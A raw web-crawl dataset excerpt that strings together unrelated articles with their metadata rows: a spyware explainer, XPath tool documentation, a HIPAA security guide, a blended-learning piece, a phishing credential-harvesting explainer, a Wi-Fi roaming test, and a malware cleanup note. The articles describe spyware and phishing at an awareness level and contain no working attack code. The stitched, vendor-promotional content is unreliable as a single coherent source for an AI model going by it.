text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
If spyware gets installed on your computer, a third party (maybe a hacker, suspicious spouse, or advertising company) gets access to your data. They might have the ability to view anything from your browsing history to your personal photos to your online banking credentials.
In this article, we’ll look at what is and isn’t spyware, how it works, and how to remove it from your computer.
Spyware falls under the broader category of malware, or malicious software. In particular, any program that gathers your personal information and sends it to a third party is classified as spyware.
Many different types of cybercriminals use spyware. Sometimes, hackers trick lots of people into installing spyware to steal their credit card information or banking passwords. Other times, someone will install spyware on their husband’s or wife’s computer to confirm suspicions of cheating. The most nefarious kinds help commit identity theft, allowing criminals to impersonate victims to governments and banks.
Types of spyware
By definition, spyware is a program running on the victim’s computer, so hardware-based keyloggers don’t count. However, there are a lot of different kinds of spyware:
- System monitors, including keyloggers. These programs monitor the computer’s inputs and outputs for useful information. Keyloggers, the most common type, record every keystroke typed on the computer, including potentially sensitive passwords.
- Info-stealing spyware. Unlike keyloggers, these programs don’t indiscriminately record keystrokes. Instead, they convey specific information from the user’s computer to a third party. This kind of spyware frequently targets photos, browser history, password databases, and other sensitive information.
- Banking trojans. Multiple types of banking trojans exist, including some that aren’t spyware (like those that add fake buttons to banking websites). However, many of these malicious programs steal passwords to make unauthorized transactions. Advanced banking trojans combine these properties: they take the victim’s password, steal their money, and make it look like nothing happened.
- Rootkits. Regular malware runs on top of the operating system; rootkits run beneath it, evading detection and removal. Hackers sometimes combine rootkits with other types of malware.
- Employee monitoring software. While not usually nefarious, this kind of software is sometimes classified as spyware. It functions similarly to spyware created by criminals, although antivirus programs don’t generally flag it as malicious. Employee monitoring software may record users’ activity within certain applications, including web browsers.
- Logging VPNs monitor and sell their victims’ Internet activity for advertising purposes. While these malicious VPNs still have the same properties as a legitimate option, they collect data that reputable VPN providers do not.
How does spyware work?
Like other malware, spyware usually arrives on a victim’s computer when they run a fake program (known as a Trojan horse), open email attachments from unknown senders, or allow someone else to access their computer.
Once spyware arrives on a victim’s computer, it will attract as little attention as possible. Since most spyware strives to steal information silently, any hint to its existence could be detrimental to its success. On occasion, however, spyware will combine with adware to display especially personalized advertisements.
From there, different kinds of spyware work somewhat differently:
- Keyloggers silently record everything that users type on the infected computer, relaying the information to the attacker or storing it in a file.
- Other types of system monitors relay all or some of the collected information to the attacker. Uploading everything displayed on the screen is prohibitively slow, so spyware utilizing this strategy must scan for important or sensitive information.
- Info-stealing spyware scans files for interesting or sensitive information, uploading only the highest-value data to avoid detection.
- Banking trojans compromise the victim’s web browser to access and modify their banking site. They may also contain a keylogger component to steal passwords.
Some spyware, like the kinds intended to surveil significant others and employees, usually gets deleted when the spouse or employer chooses to do so. That said, most spyware sticks around as long as possible to scoop up as much sensitive information as it can.
Examples of spyware
Compared to some types of malware (like ransomware), spyware has been around for a long time. As a result, spyware authors have created a lot of different varieties. You can see some of the most prominent here:
- CoolWebSearch arrived on victims’ computers, bundled with other malware, through a drive-by installation. In addition to spying on users’ activity and information, it forced the user to search the web through coolwebsearch[dot]com, showed pop-up ads (including some with pornographic content), and slowed down infected computers.
- Internet Optimizer was an older spyware and adware program which covered browser error pages in advertisements. Additionally, it stole its victims’ information.
- FinFisher is a highly professional, advanced spyware program used by law enforcement and government agencies. FinFisher customers can install it on targets’ computers in a variety of ways, including malicious emails and flaws in common software.
- Onavo Protect was a mobile app produced by a Facebook subsidiary that stole user information and sold it for advertising purposes. While not as nefarious as other kinds of spyware—in particular, Onavo could not read data sent on HTTPS-secured sites—it raised the ire of many security researchers.
How do I get spyware?
Spyware arrives through a variety of different channels, from infected Microsoft Office email attachments to fake download buttons in ads.
Some of the most common ways that people accidentally install spyware include the following:
- Installing a fake updater or installer for another program. Security researchers call these types of malicious programs Trojan horses.
- Opening email attachments or clicking on links in messages from unknown senders.
- Clicking “enable” or “allow” on pop-ups without reading them thoroughly.
- Not updating your operating system or important software in a timely manner, allowing hackers to exploit security vulnerabilities.
In many common cases, spyware comes bundled with other malware.
How to remove spyware
Back in the '90s and early 2000s, skilled computer users could realistically remove malware from their computers by hand. However, modern malware—especially sneaky varieties like spyware—are too hard to remove this way. Wiping and completely reinstalling your computer practically guarantees that any malware is removed, so most experts recommend this strategy today.
To effectively wipe your computer and remove spyware, try this approach:
- Make a complete backup of your important files.
Using a clean computer, create a bootable recovery drive.
- On Windows, use Microsoft’s USB/DVD Download Tool.
- On macOS, boot from Recovery by holding down the Command and R keys.
- Reboot from the USB drive or internal recovery partition.
- Use the on-screen assistance to completely wipe (or format) your hard drive and reinstall your operating system.
- Reboot into your internal boot drive and follow the on-screen instructions to set up your computer like new.
- Install a trusted antivirus solution and scan your backup containing your most important files.
- If the files are marked clean, restore your backup by moving the files onto your newly cleaned computer.
How do I protect myself?
Most of the general suggestions for protecting yourself from malware also apply to spyware. Here are some of the most important recommendations:
- Don’t download files from untrustworthy sources, especially piracy sites.
- Avoid opening attachments or clicking links in emails from people you don’t recognize.
Don’t fall for malicious advertisements like fake download buttons.
- Using an adblocker may be a good approach to avoid these ads.
- Lock your computer when leaving it unattended. If you’re especially paranoid, consider using full-disk encryption.
- Use an antivirus solution to proactively monitor your computer for signs of spyware and other malicious software.
- Keep your software up to date to avoid falling victim to security vulnerabilities. Pay special attention to your web browser and antivirus software.
- Stick to reputable VPNs to avoid having your Internet traffic logged and used for advertising.
Most importantly, always make sure to stay vigilant and skeptical of websites and emails on your computer. | <urn:uuid:ab61318f-4838-43d1-9727-7323d593a570> | CC-MAIN-2022-40 | https://cybernews.com/malware/what-is-spyware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00714.warc.gz | en | 0.896748 | 1,808 | 2.796875 | 3 |
XPath Generator Utility¶
Sequences Generator Toolbar includes a utility that simplify the task of generating a XPath expression to locate an element on a page. The tool generates the smallest XPath expression (i.e. the one referencing the minimum number of nodes an attributes) required to uniquely identify the element in the page. The obtained expression can be used with the ITPilot functions XPATH and XPATHLIST (see section Functions for Page Handling) or with the NSEQL command FindElementByXPath.
Open the tool clicking the button.
To generate an XPath expression:
Start typing the URL of the page in the top of the wizard and press ENTER to load the page. If the target element is not on the page then perform the required actions on the embedded browser to make the target element appear on the page.
Click the button “Start XPath generation”. This will make the tool to enter in a “generation mode” where mouse actions on the browser control have no effect on the HTML page. If you need to make browsing actions again, click “Stop XPath generation” to return to the “browsing mode”.
Click the target element. It will be highlighted with a red rectangle. The component below the browser control will display the DOM route to the target element in a tree and the generated expression is shown at the bottom of the wizard. Click on any of the nodes of the tree to see its XPATH expression.
The “Copy to clipboard” button copies the generated expression to the clipboard. | <urn:uuid:8d76eae7-61fc-459f-b62a-4a5c69c89c2a> | CC-MAIN-2022-40 | https://community.denodo.com/docs/html/browse/latest/en/itpilot/generation_environment/generating_navigation_sequences/xpath_generator_utility/xpath_generator_utility | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00714.warc.gz | en | 0.691286 | 348 | 2.671875 | 3 |
The dark web refers to the internet’s encrypted areas known for providing anonymity to the hacker. The dark web is a subset of the deepweb. It is intentionally hidden, requiring a specific browser—Tor.
This part of the internet isn’t visible to search engines and requires the use of an anonymizing browser like Tor to be accessed.
Innovations in computer software and technology are often created with good objectives. Unfortunately, criminals rapidly employ novel technology to enhance prevailing criminal practices or produce new forms of crime. One of the state-of-the-art crime forms is the usage of cryptocurrency to execute transactions, mostly illegal ones, on the dark web.
Cybercrime has been a growing threat for decades, ever since the Internet became widespread. Some news reports suggest that nearly 80% of organizations in the USA were the victims of an online attack in 2020 alone. For this reason, you must understand what the capabilities of people online are, so you can try to combat them. | <urn:uuid:65bdfe1f-bafe-40b9-883e-498fef023c8e> | CC-MAIN-2022-40 | https://cyberintelligencehouse.com/category/darkweb-and-deep-web/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00714.warc.gz | en | 0.945081 | 203 | 3.140625 | 3 |
What is HIPAA
HIPAA stands for Health Insurance Portability and Accountability Act. HIPAA provides data privacy and security measures for safeguarding medical information such as biometric data, patient health history, etc. It was signed into law in the year 1996, by President Bill Clinton. The act contains five titles covering:
- Prevention of group health plans from refusing to cover individuals who have pre-existing diseases or conditions, and prohibits them from setting limits for lifetime coverage
- Standardizing the processing of electronic healthcare transactions nation-wide
- Regulation of provisions that are tax-related, as well as general medical guidelines
- Health insurance reforms, including provisions for those who have pre-existing diseases or conditions, and individuals who are seeking continued coverage
- Regulation of provisions associated with company-owned insurance, and treatment of those who lost their citizenship for income tax reasons
In order to comply with the technical aspect of HIPAA, though, every US-based organization keeping any contacts in relation to the Act needs to make sure that has taken appropriate technical measures to safeguard medical data.
Most Considerable Health Data Breaches and Their Causes
Healthcare IT News reports that healthcare continued to be a lucrative target for hackers in 2018 with weaponized ransomware, misconfigured cloud storage buckets and phishing emails dominating the year. Cyber criminals, they say, will likely get more creative despite better awareness among healthcare organizations at the executive level for the funding needed to protect themselves.
Some of the most significant healthcare data breaches in 2018 are as follows:
|Year||Organization||Records Affected||Cause of data breach|
|2018||UnityPoint Health||1.4 million patient records||Phishing emails|
|2018||LifeBridge||500000 patient records||Malware|
|2018||Oklahoma Medicaid||280,000 patient records||Database hacked|
Top Considerable Health Data Breaches| Data Aggregated from Healthcare IT News articles
The table shows that the most common data breach causes are related with poor database protection, or with poor IT-related staff training. Processes and procedures, in other hand, provide clear guidelines on what to steps to follow in order to minimize the risk of information security breach, and how to proceed further in cases of security incidents.
Data integrity is another aspect which is often neglected by organizations. According to high level security experts, “Data Integrity Is the Biggest Threat in Cyberspace”. And whether it’s an external or internal attack, the risk is there, and if you don’t get to know that the integrity of your data is compromised, you may not know there was an attack in the first place.
Putting together all these measures guarantees a proportionate level of data protection. Another aspect, however, is protecting the patient database the way it can’t be easily breached. In order to illustrate the main things every healthcare organization needs to consider we conducted the guide below.
Main HIPAA IT Aspects
In terms of protecting sensitive personal data certain access control measures should be taken by every organization which keeps medical records. It is required to implement appropriate technical policies and procedures, and secure physical and digital access to data. Electronic information systems that maintain electronic protected health information organisations are bound to allow access only to those persons or software programs that have been granted access rights.
The IT implementation of this requirement is related to three important aspects:
- Keeping an unmodifiable audit log for each access to sensitive data per profile – keeping logs of who accessed certain data type and at what time can help us investigate in case of data breach. However, if logs can be deleted or modified by anyone within the organization (even system admin), who also has access to various company assets, can potentially be considered as vulnerability. For this reason we created Sentinel Trails -a blockchain-based secure audit trail which makes data manipulation practically impossible.
- Real-time incident reporting – A real-time reporting allows managers and quality auditors to take full control over data access. They can keep an eye on the access logs and be aware of any types of anomaly behavior – e.g. who accessed sensitive data outside their work hours, who exported big data arrays and is not supposed to, who made changes on the database, etc.
- Fraud Detection – Anomaly activities, though, can be automatically detected and alerts sent to responsible parties based on certain rules set up. Such an alert can be accessing data outside the work hours. This way the person responsible for quality assurance can receive a phone/email notification after the pre-defined alert rule is triggered and investigate the issue in a timely manner
Fraud Detection: Rule-based Alert Setup | Image Source: Sentinel Trails advanced dashboard menu
To implement appropriate IT measures, first prepare an IT implementation plan covering the security measures that have not been implemented yet. To deliver high quality, conduct an annual internal audit to take proper corrective and preventive measures based on the implementation.
The following four IT aspects should be carefully reviewed and implemented in accordance to the needs of the organisation:
|Unique user identification||Emergency access procedure||Automatic logoff||Encryption & decryption|
|Assign a unique ID (name, number, combination of symbols) to identify and track user identity.||Establish procedures for obtaining necessary electronic protected health information during an emergency.||Make sure you have established procedures to terminate sessions after a predetermined time of device inactivity.||Encrypt and decrypt any protected health information (PHI).|
Make sure the database you store PHI is also encrypted and the data transfer- secure
HIPAA Audit Control and Audit Log Requirements
Once implemented, any PHI-related software, hardware and procedures should be carefully audited on a regular basis.
Audits ensure that the organisation is continually engaged with the protection of sensitive data, and demonstrates its responsibility to improve it. The audit control is important to demonstrate compliance with the HIPAA. But at the same time it is vital to ensure compliance with other data privacy-related regulations such as GDPR.
Audit logs can ensure a smooth audit process and minimum staff involvement. Audit logs provide useful and at the same time irreplaceable information about following everyday processes, and help the auditors to get a better overview on the security measures taken, such as access granted.
Data integrity is a key for HIPAA compliance. Implementation of policies and procedures that protect electronic PHI from improper alteration or destruction can prevent various data breaches. Implementation of electronic mechanisms to corroborate that electronic PHI has not been altered or destroyed in an unauthorized manner is also a must-have. Best case scenario is developing an all-in-one overview where auditors and operations managers can review and quality check if only authorized persons can access sensitive data.
Person or entity authentication
Implement procedures to verify that a person or entity seeking access to electronic PHI is authorized to receive it.
Make sure all the procedures and processes you implement are in line with your organisation policies. Also make sure that they are being audited on a regular basis.
Best practices for person/entity authentication guidelines include:
- Keeping an unmodifiable, time-stamped audit log in relation to each incoming PHI request
- Keeping an unmodifiable, time-stamped audit log in relation to who processed it
- Keeping an unmodifiable, time-stamped audit log that the request has been verified before processed
Data transmission is a potential information security gap. Transmitted data can easily become a target so keeping it secure is a priority for each organisation, especially for those keeping ePHI.
Certain integrity controls and encryption measures can reduce the data breach risk to minimum:
|Implement security measures to ensure that electronically transmitted PHI is not misused without detection until its disposal.||Implement a mechanism to encrypt electronic PHI whenever deemed appropriate.|
|Make sure you have set up certain event log alerts for tracking misuse.||Audit all your records where you store PHI and plan how to minimize it and keep it encrypted.|
How Can LogSentinel Secure Your Medical Data
LogSentinel’s business focus is keeping sensitive data safe, and making it easier to investigate who is responsible for a data breach event. We previously reviewed the most common practices to prevent various types of data breaches. But not every organisation has the capabilities to do this alone. That’s why we developed a 360-degree, compliance-as-a-service solution, helping small and medium organisations to solve their information security issues seamlessly.
Protection of PII and health records
We offer a ‘Privacy by Design‘ secure database. We encrypt every record individually, using a secure key hierarchy making data breach events practically impossible. Therefore SentinelDB can be considered as a HIPAA compliant database
Keeping unmodifiable logs of activity
Most of the data breach attempts are initiated by insiders.
Very often insiders manage to cover their traces making it impossible to track back who has breached the data.
With SentinelTrails, your activity logs will be kept safe on blockchain, so that no one would be able to access your data without any evidence.
This feature fully covers the HIPAA audit log requirements.
Fraud and anomaly activity detection
Thanks to the advanced technology used for developing SentinelTrails, you can receive real-time notification if anomal activity is detected – e.g. access to PII outside of work hours
Real-time alerts can help prevent highly sensitive data breach and save company reputation.
Take control over the sensitive data you own.
The real-time analytics gives you an overview on the activity during the period you’ve chosen to observe.
Easy Integration. Zero maintenance.
Minimum efforts are required from your side.
Our expert team will adapt our services to the exceptional requirements of your organization, so that you can focus on what’s actually important – saving lives.
If you would like to explore more about the information security solutions, contact us today.
Denitsa Stefanova is a Senior IT Business Analyst with solid experience in Marketing and Data Analytics. She is involved in IT projects related to marketing and data analytics software improvements, as well as the development of effective methods for fraud and data breach prevention. Denitsa supports her IT-related experience by applying her skills into her everyday duties, including IT and quality auditing, detecting IT vulnerabilities, and GDPR-related gaps. | <urn:uuid:606b7305-4d59-45f7-8c2d-50534965e7c4> | CC-MAIN-2022-40 | https://logsentinel.com/blog/hipaa-it-compliance-guide/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00714.warc.gz | en | 0.922668 | 2,151 | 2.90625 | 3 |
As it turns out, distracting little kids with bright computer screens may the answer to maximizing their education. New models in use in California are showing how to successfully incorporate computers into elementary schools.Katherine Mangu-Ward wrote an August 7 article for Future Tense – a partnership of Slate, the New America Foundation and Arizona State University – that detailed a new blended learning environment in which classroom control goes back and forth between classroom management software designed specifically for young children and traditional teachers.
“Online learning appears to be a classic disruptive innovation with the potential not just to improve the current model of education delivery, but to transform it,” Heather Staker wrote in a May 2011 Innosight Institute report.
How it works
The model Mangu-Ward highlighted is a hybrid system. For example, a classroom of 30 students may have 15 computers. At any one time, half of the class will be at a computer and the other half will be taught by the teacher. Throughout the day, students rotate between learning from the teacher and the computer. This way, one teacher can more effectively manage a larger classroom.
“The common feature in the rotation model is that, within a given course, students rotate on a fixed schedule between learning online in a one-to-one, self-paced environment and sitting in a classroom with a traditional face-to-face teacher,” according to the Innosight Institute report. “It is the model most in between the traditional face-to-face classroom and online learning because it involves a split between the two and, in some cases, between remote and onsite. The face-to-face teacher usually oversees the online work.”
The classroom software used is optimized for both teachers and students. Teachers are able to track each child’s progress, and can offer more personalized guidance on specific topics. The software is also made with young students in mind, and includes features such as picture-based logins and talking cartoon animals to guide them through each lesson, according to Future Tense.
Schools that have implemented blended learning methods into classrooms have seen dramatic increases in test scores, according to the Knowledge is Power Program. Mangu-Ward wrote that she observed this technology improving classroom relations. She said computers allow for students to better communicate with and help out each other, while also receiving more face time from teachers over the course of a school year.
“[O]nline learning has the potential to be a disruptive force that will transform the factory-like, monolithic structure that has dominated America’s schools into a new model that is student-centric, highly personalized for each learner, and more productive,” Staker wrote.
Are children as young as five too young to learn from classroom management software? When is the best time for students to be first introduced to online learning? Leave your comments below to let us know what you think! | <urn:uuid:55266af1-178f-4705-9931-5ae20f512e8b> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/classroom-management-software-for-youngsters | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00714.warc.gz | en | 0.964317 | 600 | 3.6875 | 4 |
Bank robbers have to meticulously plan the perfect get-away. Burglars need to be careful that their DNA is not left at the scene of the crime. Car thieves must constantly dodge security cameras to avoid getting caught. Cybercriminals, on the other hand, must live relatively stress-free lives, considering their biggest worry is whether or not you’ll type in your password.
It’s called credential harvesting and it’s largely considered the foundation of email phishing. If you think about it, the easiest way for anyone to get into your secure files is by simply using your password. And, for many of us these days, we have a single sign-on (a.k.a one password) that provides access to the bulk of our personal and company files.
Consider these terrifying password statistics:1
- 50% of people use the same password for all their logins.
- The most common password in the world is “123456”.
- The average password is eight characters or less in length
- Only 31.3% of internet users update their passwords once or twice a year.
- 90 out of 10 passwords are vulnerable to attack.
Are you wondering how credential harvesting works?
Here are the basic steps:
- The hacker sends a phishing email.
In many cases, fear is used as a distracting motivator and the topic is something that the reader can relate to. Subjects might include an unpaid parking ticket, an invoice that’s past due, or how to access money that’s coming to you. Regardless, the sender will generally go to some lengths to make the email seem legitimate. Expect to see logos and important titles. There may also be a deadline in the message since we’re more apt to act without thinking if we’re rushed.
- You’re encouraged to click on a link and perform a task.
As mentioned above, you’re encouraged to act quickly in order to resolve some sort of issue. Honestly, this would be a good place to stop and reread the email. Since many credential harvesting schemes originate outside the U.S., chances are the phishing email has a number of flaws, including grammatical and spelling errors.
- The link takes you to a web page.
Much like the phishing email, the web page will look legitimate. The truth is, however, that one of the first steps a hacker has to take to set up these elaborate phishing schemes is to make a replica of a real website to draw you in even further. Unfortunately, behind what looks like a legitimate site, lurks a disguised IP address and the hacker’s server which detects and captures any secure information you type into the password fields.
- You’re tricked into entering your email address and password.
You’ll likely see a short message and be encouraged to sign in using your cloud-based company email address and password.
- The hacker retrieves your password from his server.
The webpage might be a clone of something legitimate, but the back end of it is set to send information right to the hacker.
- The hacker exploits your harvested credentials.
Once they have them, cybercriminals can use your harvested credentials in a number of ways including gaining access to anything from bank records to employer files and using your email to deceive those close to you into surrendering important company data or banking access. Or, your credentials can be sold on the dark web.
Now, if you think credential harvesting couldn’t happen to you, consider the fact that a business falls victim to a ransomware attack every eleven seconds.1 This is especially true in the U.S., which has millions more reported cybercrimes than any other country.2 In 2021 alone, the FBI reported $6.9 billion in losses with phishing attacks being the top culprit.2 It might even make you wonder where these cybercriminals are coming from. Well, sadly, becoming a hacker or cyber thief is easier than you think. In fact, there are plenty of blog posts and online videos that attempt to teach the average Joe how to set up their own successful credential harvesting scheme. That alone should tell you two things — first, more people than you realize (at all skill levels) could be attempting this type of email phishing scheme. And, secondly, you should take the steps now to protect yourself, your employees, and your company. The best way to start is by using two-factor authentication for your logins, and also consider the many benefits of hiring a third-party email security expert to uncover these types of credential harvesting threats before they wreak havoc on your business.
INKY can protect you from becoming a victim of credential harvesting. A cloud-based email security platform, INKY proactively and instantly scans inbound, internal, and outbound emails to eliminate phishing and malware. INKY's patented technology sanitizes all emails, detects foul play, disarms phishing emails, and reconstructs each email using safe and standard HTML5. From there, INKY’s Email Assistant injects a user-friendly HTML banner with one or more of nearly 60 warning messages to educate the recipient with specifics of the threat. With INKY, you can even report a phishing email with a click, from any device or email client. Request a demo of INKY today.
Learn more about credential harvesting and see how INKY caught an attempted harvester posing as the Department of Justice: Read INKY's Special Report on Credential Harvesting.
INKY is an award-winning, cloud-based email security solution developed to proactively eliminate phishing emails and malware while simultaneously providing real-time assistance to employees handling suspicious emails so they can make safer decisions. INKY’s patented technology incorporates sophisticated computer vision, machine learning models, social profiling, and stylometry algorithms to effectively sanitize emails, rewrite malicious links, detect and block security threats, mitigate sender impersonation, and more. Cost-effective and powerful, the INKY platform was developed for mobile-first IT organizations and works seamlessly on any device, operating system, and mail client. Learn more about INKY™ or request an online demonstration today. | <urn:uuid:ac47050e-1138-462c-822d-e2a62678b1bd> | CC-MAIN-2022-40 | https://www.inky.com/en/blog/credential-harvesting-virtually-hijacking-your-employees-credentials-2022 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00714.warc.gz | en | 0.930529 | 1,288 | 2.8125 | 3 |
WHAT IS AGILE SCRUM ENVIRONMENT?
As a set of values and principles that describes a group's day-to-day interactions and activities, Agile provides the framework for an iterative and incremental software development approach. Scrum is one of the implementations of the Agile methodology, laying out certain software development practices in more prescriptive and specific terms.
Widely used by software development teams, Scrum is believed to be the most popular Agile methodology. Scrum is ideal for projects where requirements are rapidly changing, which is often the norm. Characterized by frequent incremental builds and releases, the benefits of Scrum include higher productivity, better quality products, better team dynamics, and reduced time to market.
Although initially developed for Agile software development and the management of complex projects in a rapid delivery, team-based environment, Agile Scrum has become a preferred framework for Agile project management in general and is sometimes simply referred to as Scrum project management or Scrum development. | <urn:uuid:6c91c834-a773-4031-97c2-2b2bd3f5f8e4> | CC-MAIN-2022-40 | https://www.contrastsecurity.com/glossary/scrum?hsLang=en | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00714.warc.gz | en | 0.932962 | 207 | 2.8125 | 3 |
Teacher Training and Blended Learning Success
Blended learning, where students split their time between in-class lessons and online work, has become increasingly popular in K-12 education due to its success. Unsurprisingly, researchers found that blended learning was much more successful when the teacher had received proper and thorough training and support. What’s more, they had the support from schools and districts to aid their learning, too.
A recent report found that blended learning transformed teaching practices for 43 percent of teachers surveyed, while 44 percent said that the same tech has improved their students’ performance. The teachers also noted that their schools were at least offering some formal support for blended technology. Unfortunately, their peers who indicated that technology hasn’t changed their classroom for the better didn’t receive the same amount of support.
Although blended learning reimagines teaching and has successful results, schools should know that it comes as an investment. Teachers need to be correctly trained, and many schools often aren’t prepared for the investment of time and teacher training to turn a traditional classroom into a blended one. In addition, the lack of investment in quality technology and infrastructure led to challenges in implementing blended learning.
For some schools, not having enough devices for each student made it difficult to complete online activities on time. Other schools said that they had to prepare two lesson plans, just in case their Internet connection went down.
Schools can benefit from implementing modern technology into the classroom. To help protect your ever-evolving school, contact D&D Security by calling 800-453-4195 or by clicking here. | <urn:uuid:0103fb5d-844b-407b-a556-90bc296050ed> | CC-MAIN-2022-40 | https://ddsecurity.com/2018/01/25/pd-planning-tech-investments-learning-success/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00714.warc.gz | en | 0.985951 | 328 | 2.75 | 3 |
Filters control how frames are processed and captured.
The frame processing pipeline
This figure shows the functional blocks in the frame processing pipeline.
The frame passes through a number of functional blocks. Each block is controlled by a recipe. For example, the Color block can contribute to the "color" value of the frame, the Slicing block can cut out parts of the frame, and the Packet Descriptor block will attach a packet descriptor with relevant information about the frame. The last functional block, the Queue Manager, decides which stream will receive the frame.
The recipes are specified by filters, described below. If no filters are defined, all functional blocks will execute their default recipe. For example, the default recipe for the Queue Manager will drop the frames.
Each filter consists of a filter expression and a number of recipes.
A filter expression is a combination of protocol, IP match, port and various other tests.
- Color assignment
- Hash key calculation
- IP fragment handling
- Packet descriptor building
- Distribution to streams (queue management)
When a frame is received, all functional blocks are reset to their default recipe.
The frame is then presented to each filter in reverse priority order (the filter with the lowest priority is consulted first). If the frame matches the filter expression, the associated recipes are copied to the relevant functional blocks, replacing the recipes already there. This way, a higher priority filter overrules the behavior specified by a lower priority filter.
When all filters have been consulted, the frame is run through the functional blocks.
In effect, each resulting function recipe (including distribution to streams) can be picked from a different filter.
Filters are specified using the Assign NTPL command. Each Assign command specifies a new filter. Recipes are specified as options to the Assign commands.
In the following example, frames with length greater than or equal to 1000 bytes are processed using recipes from two different filters.
Assign[StreamId = 1; Priority = 20; Slice = Layer4Header] = Length >= 300 Assign[StreamId = 2; Priority = 10] = Length >= 1000
Filter 1 matches all frames with length greater than or equal to 300 bytes. Filter 2 matches all frames with length greater than or equal to 1000 bytes. Suppose a frame with a length of 1000 bytes is received. Both filters will match with filter 2 having the highest priority. Because filter 2 has the highest priority and it defines a StreamId recipe, the frame will be sent to stream 2. Filter 2 does not define a Slice recipe; however filter 1 does, and because it is the next highest priority filter that also matches the frame, the frame is sliced according to filter 1's Slice recipe. | <urn:uuid:6f2d78ab-6221-4de1-b3f1-9828a863c255> | CC-MAIN-2022-40 | https://docs.napatech.com/r/Feature-Set-N-ANL9/Introduction | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00114.warc.gz | en | 0.881599 | 582 | 2.8125 | 3 |
One extremely beneficial aspect of Wi-Fi networks is mobility. For example, a person can walk through a facility while carrying on a conversation over a Wi-Fi phone or downloading a large file from a server. The Wi-Fi radio inside the user device automatically roams from one access point to another as needed to provide seamless connectivity. At least, that’s what we hope will happen!
In the past, I’ve experienced issues with roaming, so I decided to perform some testing to get an inside view of what’s really happening. I was especially curious about how fast roaming actually works, and whether or not it’s disruptive to wireless applications.
My test configuration included two standard access points, with one access point (AP-1) set to channel 1 and the other access point (AP-2) set to channel 6. Other settings were default values, such as beacon interval of 100 milliseconds, RTS/CTS disabled, etc. The access points were installed in a typical office facility in a manner that provided a minimum of 25dB signal-to-noise ratio throughout each access point’s radio cell, with about twenty percent overlap between cells. This is somewhat the industry standard for wireless voice applications. The roaming client in my case, though, was a laptop equipped with an internal Intel Centrino Wi-Fi radio (Intel 2915ABG).
While standing with the wireless client within a few feet of AP-1, I used AirMagnet Laptop Analyzer (via another Wi-Fi card inserted into the laptop’s PC Card slot) to ensure that that I was associated with AP-1. I then kicked off an FTP transfer of a large file from the server to the laptop and started measuring the 802.11 packet trace using AirMagnet. With the file downloading throughout the entire test, I walked toward AP-2 until I was directly next to it. With the packet trace, I was able to view the exchange of 802.11 frames, calculate the roaming delay, and see if there was any significant disruption to the FTP stream.
Once the client radio decided to re-associate, it issued several 802.11 disassociation frames to AP-1 to initiate the re-association process. The radio then broadcast an 802.11 probe request to get responses from access points within range of the wireless client. This is likely done to ensure that the client radio has up-to-date information (beacon signal strength) of candidate access points prior to deciding which one to re-associate with.
AP-2 responded with an 802.11 probe response. Because the only response was from AP-2, the client radio card decided to associate with AP-2. As expected, the association process with AP-2 consisted of the exchange of 802.11 authentication and association frames (based on 802.11 open system authentication).
The re-association process took 68 milliseconds, which is the time between the client radio issuing the first dissociation frame to AP-1 and the client receiving the final association frame (response) from AP-2. This is quite good, and I’ve found similar values with other vendor access points.
The entire roaming process, however, will interrupt wireless applications for a much longer period of time. For example, based on my tests, the FTP process halts for an average of five seconds prior to the radio card initiating the re-association process (i.e., issuing the first disassociation frame to AP-1). I measured 802.11 packet traces indicating that the client radio card re-retransmits data frames many times to AP-1 (due to weak signal levels) before giving up and initiating the re-association with AP-2. This substantial number of retransmissions disrupted the file download process, which makes the practical roaming delay in my tests an average of five seconds! Centrino is notorious for having this problem, but I’ve found this to be the case with most other radio cards as well.
Vendors are likely having WLAN client cards hold off on re-associations to avoid premature and excessive re-associations (access point hopping). Unfortunately, this disrupts some wireless applications. If you plan to deploy mobile wireless applications, be sure to test how roaming impacts the applications.
Every model of radio card will behave differently when roaming due to proprietary mechanisms, and some cards will do better than others. Just keep in mind that roaming may take much longer than expected, so take this into account when deploying wireless LAN applications, especially wireless voice, which is not tolerant to roaming delays exceeding 100 milliseconds.
Jim Geier is the principal of Wireless-Nets, Ltd, a consulting firm focusing on the implementation of wireless mobile solutions and training. He is the author of the books Deploying Voice over WLANs (Cisco Press), Wireless LANs (Sams) and Wireless Networks – First Step (Cisco Press).
This article was first published on WiFiPlanet.com. | <urn:uuid:0ad99f8a-a384-495a-acb6-948ee58afccd> | CC-MAIN-2022-40 | https://www.datamation.com/mobile/is-wi-fi-roaming-really-seamless/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00114.warc.gz | en | 0.946237 | 1,036 | 2.625 | 3 |
Unix admins have known this for a long time. There is only one way to reliably clean ANY infected machine…wipe and reload.
For a long time, the best-practices approach to malware infections has been to re-format and re-image the infected machine from known clean media. However, there are some corporate security teams that continue to simply run an antivirus product as a way to clean the computer of malware. This is often the case, especially when faced with an infection by “nuisance” malware such as spambots or rogue antivirus programs. The danger in simply running an antivirus product against the machine is that even if the antivirus product cleans the observed infection, how much other malware was installed on the machine that the antivirus engine can’t detect?
